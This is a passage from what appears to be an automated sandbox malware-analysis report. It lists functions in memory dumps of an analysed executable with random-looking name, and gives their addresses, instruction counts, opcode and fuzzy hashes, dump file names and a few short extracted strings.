Instruction ID: ca062e787a7ff3570621f64291422e7f0b41bdcb134df0112aeed12cbf243cf2
Opcode Fuzzy Hash: 271b402fb75c992475ea4384b700fcaa96237b6f1844913d438464c66418ae97
Instruction Fuzzy Hash: 6F5146B0D0850D8FEB54EB98E4596EDBBF1FF48341F40007AC00AE72E1DB3AA9448B55

Function 00007FF848F22145 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42c15550bb89b5d69110490bb60a1ce26a9c63f65d9c85e8d237957b0148f3e0
Instruction ID: d538961fb661483506f362b090103c14c40d2188fcf3c9d2e59d90a44363bdae
Opcode Fuzzy Hash: 42c15550bb89b5d69110490bb60a1ce26a9c63f65d9c85e8d237957b0148f3e0
Instruction Fuzzy Hash: E3414A31E1D68A4FE346E778A8551B8BBE0EF46380F0509FBD40CC71D2DF29A8418355

Function 00007FF848F2B33D Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0aa46d593515cd17c5211654bb5347a544c8d3c034e02ae706d61b32b665d75
Instruction ID: 3e7e3d978755553c38bb363f2a25df8a04fead42900efe3f2e8b4dae2aa1a26b
Opcode Fuzzy Hash: a0aa46d593515cd17c5211654bb5347a544c8d3c034e02ae706d61b32b665d75
Instruction Fuzzy Hash: 2841BA71E2C94ADEF741FB68A8892B97BE0FF59351F0444B6D80CC60D2EF2AA8518314

Function 00007FF848F20805 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b108776617fb7fc9e1d406da931f9e0dfb6d233470b2e4b5d7ed467836c0438a
Instruction ID: ca0d3b0acfbadb6b3ceda2562361b0c26aaf53fea0467d266d2ecbc4c002b48a
Opcode Fuzzy Hash: b108776617fb7fc9e1d406da931f9e0dfb6d233470b2e4b5d7ed467836c0438a
Instruction Fuzzy Hash: 7E21267390EA869FE745B77CA8592EA7BD0FF51399F0800B7D448CD0C3EE19A056C295

Function 00007FF848F23294 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 246bc819606cdfe1cb52b70f42ba3de7ca846c2c8a574f6f2f121d7c5dcd12ac
Instruction ID: ce4ec0e6e45b97631de13c8c307ff87bef25f582115db6eb3ef639f41716200e
Opcode Fuzzy Hash: 246bc819606cdfe1cb52b70f42ba3de7ca846c2c8a574f6f2f121d7c5dcd12ac
Instruction Fuzzy Hash: A721F270D0851D8FEB94EB98E494AECBBF1FB58341F50017AC00AE72E5CB396940CB14

Function 00007FF848F2A9B1 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82197b0a611a03e0f8fd617712f1486ceab2a3e5178d01d88e4d8ca21165d6fd
Instruction ID: bf7ffb8bdcd20cf63aa42fcfd00bb33ffe3ee27fb3546d5bb8330cadc62a2400
Opcode Fuzzy Hash: 82197b0a611a03e0f8fd617712f1486ceab2a3e5178d01d88e4d8ca21165d6fd
Instruction Fuzzy Hash: 21214D7091864D8FDB85EF18C459AA97BE0FF68345F0505AAE809D7295DB34A890CB80

Function 00007FF848F23354 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f1e56c34729ffa106b082cdcb1a1f50f73ab62c20209a28868de35bf538e34c
Instruction ID: 48b1df256fb641894cbb9449d8be7dbfa9297b775c0801d21f4bd394a21412e1
Opcode Fuzzy Hash: 3f1e56c34729ffa106b082cdcb1a1f50f73ab62c20209a28868de35bf538e34c
Instruction Fuzzy Hash: 9421C37184D78A8FE742EB7488585A57FF1EF5B301F0904EBD044C70B2DA299959C752

Function 00007FF848F234E1 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edd3fe13d9ee4950101ab19e7722cdcc4bf6eb42dbd1e31b918a260d045a3c74
Instruction ID: 8b13ced537620cc3ca1855239cc5a7b3d1b3e5125892da0117cd0ac23fca87c0
Opcode Fuzzy Hash: edd3fe13d9ee4950101ab19e7722cdcc4bf6eb42dbd1e31b918a260d045a3c74
Instruction Fuzzy Hash: 7D113C7090868E8FDB49EF68985A6BA7BA0FF18341F0409BAD419D61E1DB35A5408705

Function 00007FF848F2B1C5 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c93252f4f10f553d42b67e236d11c6fbf265c18401cf15aa9563e3eb464c6a8
Instruction ID: 740871139a5988f27df2eedf0cf0cd398c5b8578f39646e9618e717285263818
Opcode Fuzzy Hash: 7c93252f4f10f553d42b67e236d11c6fbf265c18401cf15aa9563e3eb464c6a8
Instruction Fuzzy Hash: B201D23091D94EAEEB45FB28C8592FEB7A0FF19359F0405BAD40EC60D3DF296044C644

Function 00007FF848F2B21D Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3682fa19a6486c1ebebf6d8ce0c8cc82da5cad53b6dafe6d3b79e6e0932b00b1
Instruction ID: 4b669b72f54a2d54433b08a889d0f7e6babad5bcafe7c233dae4eb3e28d419ce
Opcode Fuzzy Hash: 3682fa19a6486c1ebebf6d8ce0c8cc82da5cad53b6dafe6d3b79e6e0932b00b1
Instruction Fuzzy Hash: 65018030A1950A9EEB81BB78C44D5FE7BF4FF18345F045672D40CD60A1DF34A0818714

Function 00007FF848F205D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b72badb15a193bce25cece88e382f00e303039b249615f0175faddcf9fd9589d
Instruction ID: 3cf22a00a645f3d90368a4fbacd1a96ca0a330f78bbbf831c4a5ab4602b033d7
Opcode Fuzzy Hash: b72badb15a193bce25cece88e382f00e303039b249615f0175faddcf9fd9589d
Instruction Fuzzy Hash: 2501883094890E8FEB88EFA4D4596BAB7A1FF58345F50447AD40EC21C1CB32B590CB48

Function 00007FF848F2B260 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fe39794b51b2a34d48bb548640995edd34ad35e7ec6716213abad133589c863
Instruction ID: f30890da3d155da7229c71700e56c8594a9255aaa2fc33f1c8ed0703d371f4b4
Opcode Fuzzy Hash: 7fe39794b51b2a34d48bb548640995edd34ad35e7ec6716213abad133589c863
Instruction Fuzzy Hash: A701BC3490CA0D9FEB98EF68A4A92B977A0FF19344F1004BED00EC21D1EF326550CA05

Function 00007FF848F2285D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02d46b61e9929683c37098967564bdb725d8bbfab12df426d1804befb9942ecd
Instruction ID: a7ad94dda7e0dc18e8b65d2b3fd3c0cfe991969fe42a53fd3f60417d137342c5
Opcode Fuzzy Hash: 02d46b61e9929683c37098967564bdb725d8bbfab12df426d1804befb9942ecd
Instruction Fuzzy Hash: 4F01783190D64E8FE791BB6898996F9BBE0FF69341F5549B6D408C61A2EF39E0408704

Function 00007FF848F2B298 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd6863c37cdbba7a4ccac519b6b08e178b084df1c07f09b689d57861bd07ad40
Instruction ID: 67e36126a8f5e8832d79c293b9b8a608bca13f8a32224db3e6e8812322812422
Opcode Fuzzy Hash: dd6863c37cdbba7a4ccac519b6b08e178b084df1c07f09b689d57861bd07ad40
Instruction Fuzzy Hash: 56017C3490890EDEDB48FF24D0492BA7BA1FF68345F50447AE40EC21D4EF36A150C785

Function 00007FF848F22EF9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bbfd8b7cd3a19dcbc49a5d20ea743e4dbc0f0c7c4d2f59467bdf3817b60e714
Instruction ID: 7edf59d3a9872161c5075cd9ecb126be1190289674d18ab752d8e4b49961b065
Opcode Fuzzy Hash: 8bbfd8b7cd3a19dcbc49a5d20ea743e4dbc0f0c7c4d2f59467bdf3817b60e714
Instruction Fuzzy Hash: 9F01B13090D2894FE742BB7498591A9BBE0EF1A340F0608F6C408CB0E6EF39A444C701

Function 00007FF848F21CAD Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fad284ea7cad90d46ab3574c0af4aa85bcd00a3a16495131e12f93d796fd1820
Instruction ID: 201a6a43ce888b2f3e3b2cfcbe0e7fe2ccfbf2d70e13a9d3c3e6f5dec4e0915b
Opcode Fuzzy Hash: fad284ea7cad90d46ab3574c0af4aa85bcd00a3a16495131e12f93d796fd1820
Instruction Fuzzy Hash: F401A430C4D68D8FEB99EFA498592FA7BA0FF55341F4401BAE808C61D2DB76E590C748

Function 00007FF848F20608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ae7da5e4bd86d13149bf059386e83804d6218dc1611739eed3a62cac0386275
Instruction ID: 4e6f3c6d44f119096d152e91ddb473bf863e14a339e63684049f1f7055808e24
Opcode Fuzzy Hash: 1ae7da5e4bd86d13149bf059386e83804d6218dc1611739eed3a62cac0386275
Instruction Fuzzy Hash: 3501693081DA0E9EEB49FBA4D4582BAB6A2FF18345F10087EE41EC21D1DF36A590CA04

Function 00007FF848F20610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a572e8c60a30a216c7e94e9959ec29bc15fb4782191e75ee652f444d5a37f4f3
Instruction ID: 0c14a3e56d7dda993a1c9e249584514364d36302374a4fdec9459f370dcd5b84
Opcode Fuzzy Hash: a572e8c60a30a216c7e94e9959ec29bc15fb4782191e75ee652f444d5a37f4f3
Instruction Fuzzy Hash: 40016930819A0E9FEB49EB6494582FAB6A0FF18345F20087EE40EC21D1DF3AA590C604

Function 00007FF848F2AF0A Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bb198f4208b9cb9b2c60a742733fb8f110d6dde45d8803bbf24bc7726258264
Instruction ID: 2ce1fb238b9ca5b93d5bc6a35afd053b9ce7699b50044be1356554e53b8167f4
Opcode Fuzzy Hash: 9bb198f4208b9cb9b2c60a742733fb8f110d6dde45d8803bbf24bc7726258264
Instruction Fuzzy Hash: 6EF0497095C95E9FEB51FB38A4896BABAE0EF18341F0508B2E40DC60A5EF39A5948644

Function 00007FF848F205D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f9dbfa419eaa5037bbae39c4dcac298c9df95b8a62ac3bf4ac4dceed72b5f38
Instruction ID: aca6393e2397983cdfbe4e43dea37a75be36a67b7628604a13557055d83b4e08
Opcode Fuzzy Hash: 4f9dbfa419eaa5037bbae39c4dcac298c9df95b8a62ac3bf4ac4dceed72b5f38
Instruction Fuzzy Hash: E5F04F3485E64E8FEB45EFA4A4152FA77A4FF15345F50057AE80DC21C1DB36A590C788

Function 00007FF848F2B1C8 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 544c776fe2a9389181c743d32b837346bea5ce5bfa9bfcab1e1b2b1ac51b4d4d
Instruction ID: 54f43346fdb5189845fa22a69ad1b03712f8f5d1b49fbd08ea2de27c465d6b09
Opcode Fuzzy Hash: 544c776fe2a9389181c743d32b837346bea5ce5bfa9bfcab1e1b2b1ac51b4d4d
Instruction Fuzzy Hash: CCF0B43181EA4AADEB45BB6498192FEB7A4FF0539CF0841B6E80DC50D3DF2C6054C249

Function 00007FF848F22779 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b975f7713c938c4585f07e8f3048ab958272e3a16769c96d0e0c73b33fa23b3
Instruction ID: d0ff495e1a6e514ec3b4f796475bcde38244a819d2932187c3170ac0dc63662e
Opcode Fuzzy Hash: 7b975f7713c938c4585f07e8f3048ab958272e3a16769c96d0e0c73b33fa23b3
Instruction Fuzzy Hash: D2F0C23180E38A8FEB5AAF7498682B97B61FF16301F4508BAD409C60D2DB39A454C741

Function 00007FF848F20FA7 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cfb1be4d27fce5f45e3f8fa287de7163412cdc7605fd5791a111be77707210b
Instruction ID: b218978cf4a9188465a6681d1c12812876e278b5ab94768356681f93769008db
Opcode Fuzzy Hash: 1cfb1be4d27fce5f45e3f8fa287de7163412cdc7605fd5791a111be77707210b
Instruction Fuzzy Hash: FF012831D096198FEB50FB64C8407EDB7F0EF54301F1042A9D808E7286DF3969848F58

Function 00007FF848F227ED Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80131d674b39b414087bf18a07c1cbd0e07b439adb425c73da5d7cb65807312c
Instruction ID: 7fe769be7ce612fbc9e4b14f5747b5199b510fe7b0f51538a32acbd6187152b1
Opcode Fuzzy Hash: 80131d674b39b414087bf18a07c1cbd0e07b439adb425c73da5d7cb65807312c
Instruction Fuzzy Hash: 17F0903080E78A8FEB59AB6498591F9BBA0FF15341F4409BAD809C61D2EB3A9454C741

Non-executed Functions

Function 00007FF848F2387E Relevance: 5.1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

Strings

0r]I, xrefs: 00007FF848F23944
8r], xrefs: 00007FF848F238D4
.r]I, xrefs: 00007FF848F23954
/r]I, xrefs: 00007FF848F23924

Memory Dump Source

Source File: 0000001C.00000002.2148018231.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID: .r]I$/r]I$0r]I$8r]
API String ID: 0-2183019408
Opcode ID: 4406c6b26589bfe583c8dfdefaaa830242a75ce7f7352888114b98751deee24b
Instruction ID: 6f1591cb5e60bbc1df11f0af133e0542af9dd1d07fd03225d0d5806ae5856ac7
Opcode Fuzzy Hash: 4406c6b26589bfe583c8dfdefaaa830242a75ce7f7352888114b98751deee24b
Instruction Fuzzy Hash: AB31ADA281E6D25FE31757782C249617FA0EF63A5071941FFD180CB0EBD60A890A83A3

Analysis Process: mnUYCZffXdEgQlZPiczLektp.exePID: 7316, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848F33565 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2203103585.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f30000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 142554f994f593871924580805caa8b309cfd8970ffc317f7c173b428286e9ab
Instruction ID: 57e467067cf559304fdc5ddebe0d453310d40475103afbdaa9490a2fdf469a7d
Opcode Fuzzy Hash: 142554f994f593871924580805caa8b309cfd8970ffc317f7c173b428286e9ab
Instruction Fuzzy Hash: 4D91AE31E1C94A8FE784EB6CE8197A9BBE1FF9A354F50017AC009D32CADF6928058755

Function 00007FF848F41440 Relevance: 2.6, Strings: 2, Instructions: 51COMMON

Download Yara Rule

Strings

/, xrefs: 00007FF848F414A9
., xrefs: 00007FF848F4145A

Memory Dump Source

Source File: 0000001D.00000002.2203103585.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f41000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID: .$/
API String ID: 0-2544594439
Opcode ID: a26f53201ed534dfe1f92f50b0e6aff985ba132be7222aa2f453d561485b3c6d
Instruction ID: c0fc9f4139c2d3778570ca27e70bcea68afdb8baaff333caedb588fe1501709e
Opcode Fuzzy Hash: a26f53201ed534dfe1f92f50b0e6aff985ba132be7222aa2f453d561485b3c6d
Instruction Fuzzy Hash: 5C119A34E09329CFDB24DB80C8547ECB3B1EF51760F2042AAD00DAB2E1DB781A88CB44

Function 00007FF848F47A45 Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

H, xrefs: 00007FF848F47A59

Memory Dump Source

Source File: 0000001D.00000002.2203103585.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f41000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: f761da6e9b71c67ec32f45c9c5a3ddd0923fa3b98523ef90e94cad6d91d27823
Instruction ID: a57754937806bd75dd8f45be4999df18eed8e12270f91c219e4c525b4b52684c
Opcode Fuzzy Hash: f761da6e9b71c67ec32f45c9c5a3ddd0923fa3b98523ef90e94cad6d91d27823
Instruction Fuzzy Hash: DD410570D0861E8FEB54EFA4D4947ECBAF0AF58350F14053AD009F62D1DB78A988CB59

Function 00007FF848F30A01 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

(vH, xrefs: 00007FF848F30A70

Memory Dump Source

Source File: 0000001D.00000002.2203103585.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f30000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID: (vH
API String ID: 0-1172161155
Opcode ID: b177e501d65193c464cc7492892e0e6ac73b8265cf1b2e641704b8f289100a81
Instruction ID: c3e8f47c8aca40d0b85e3affd93452eabb3b1a6c50e97ac88a032b48a1f392ec
Opcode Fuzzy Hash: b177e501d65193c464cc7492892e0e6ac73b8265cf1b2e641704b8f289100a81
Instruction Fuzzy Hash: F6116A31D0954E9FEB80FB68D8492BE7BE0FF98380F4005B7D809C6192EF38A5448700

Function 00007FF848F3123D Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F312AD

Memory Dump Source

Source File: 0000001D.00000002.2203103585.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f30000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: a96ddc63d2fb94f22fc41f3360f1d7279796e2e0bffe8418a4b66ec3aa6addde
Instruction ID: 290acf658cca8dc0c66c830248308d34956d0ba9864ef840f0e50c5ff9e06227
Opcode Fuzzy Hash: a96ddc63d2fb94f22fc41f3360f1d7279796e2e0bffe8418a4b66ec3aa6addde
Instruction Fuzzy Hash: 1811BF30D0D64E8EEB99FB6884592B97BE0FF5A341F0405BBE00AD60D2EF29A480C710

Function 00007FF848F31250 Relevance: 1.3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F312AD

Memory Dump Source

Source File: 0000001D.00000002.2203103585.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f30000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: 9d77a371624e10987eb50789188452511df43a60edb5fd8c61f44d310b69c56a
Instruction ID: 3a47028c1ba5373cc14021c02d64e15605f368ab4087a8cda02422b6c7b2444a
Opcode Fuzzy Hash: 9d77a371624e10987eb50789188452511df43a60edb5fd8c61f44d310b69c56a
Instruction Fuzzy Hash: 3AF0AF30D1D65F8EEB98BB6898182BA77E4FF56355F04067BE40DE20D1EF2855948214

Function 00007FF848F3FD2D Relevance: 1.3, Strings: 1, Instructions: 11COMMON

Download Yara Rule

Strings

/, xrefs: 00007FF848F3FD4B

Memory Dump Source

Source File: 0000001D.00000002.2203103585.00007FF848F3F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f3f000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: abfaca1340e5fa52885e9b5c6a494372cc09fb373e3e002210ee3d8dff2d3142
Instruction ID: 51e866d008b21be42361a7a7c2d0d277bec1cd4bc810730387eb40f969d63c1f
Opcode Fuzzy Hash: abfaca1340e5fa52885e9b5c6a494372cc09fb373e3e002210ee3d8dff2d3142
Instruction Fuzzy Hash: 6DD0CEB0D1855D8FDBA4EF14C4557B976B1AF54340F1001BA950DE3291CF7469848F55

Function 00007FF848F437E8 Relevance: .5, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2203103585.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f41000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd1a0b4cd751567e870a353312ae0df63380a937916b03cc3c7495c5078640bf
Instruction ID: 5900558858474f69ad220bcb666a8c1916ff3005bde9c9469a099fc95066010b
Opcode Fuzzy Hash: dd1a0b4cd751567e870a353312ae0df63380a937916b03cc3c7495c5078640bf
Instruction Fuzzy Hash: 5C21603190E6C99EE752E73888596A97FF0FF16741F0904FBC458DB0E3EA286548C712

Function 00007FF848F305A0 Relevance: .3, Instructions: 309COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2203103585.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f30000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44196e642d37e5e21a4d02240d9dc00d21333f695cd7b9b9ce7a9fe7a5e00052
Instruction ID: 0b546b945578facbfb93ed83d645f71dba9e17b3725fd016ee186a56744c3d4a
Opcode Fuzzy Hash: 44196e642d37e5e21a4d02240d9dc00d21333f695cd7b9b9ce7a9fe7a5e00052
Instruction Fuzzy Hash: 61911723D0F5D68EE255B77C78161FA6BA0FF926A4F0C43F7D4888A0DBDE1C54068299

Function 00007FF848F43DAF Relevance: .3, Instructions: 302COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2203103585.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

